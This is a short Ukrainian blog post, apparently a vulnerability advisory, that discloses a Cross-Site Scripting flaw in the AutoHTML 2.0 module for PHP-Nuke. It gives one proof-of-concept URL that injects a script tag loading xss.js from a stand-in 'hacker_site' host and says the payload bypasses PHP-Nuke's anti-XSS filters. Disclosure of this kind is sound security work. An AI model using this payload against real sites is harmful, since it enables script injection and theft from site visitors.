« MustLive Perl Pascal Programs Interpreter
Добірка експлоітів »

Уразливість в AutoHTML для PHP-Nuke

23:53 29.05.2008

Вчора, 28.05.2008, я знайшов Cross-Site Scripting уразливість в модулі AutoHTML для PHP-Nuke. Про Local File Inclusion, Directory Traversal та Information Leakage уразливості в даному модулі для PHP-Nuke я писав раніше.

XSS:

http://site/autohtml.php?filename=%3Cscript%20src=http://hacker_site/xss.js%20

В даному випадку відбувається обхід анти-XSS фільтрів PHP-Nuke.

Уразлива версія PHP-Nuke AutoHTML Module 2.0 (та потенційно інші версії).


This entry was posted on 23:53 29.05.2008 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

Leave a Reply

You must be logged in to post a comment.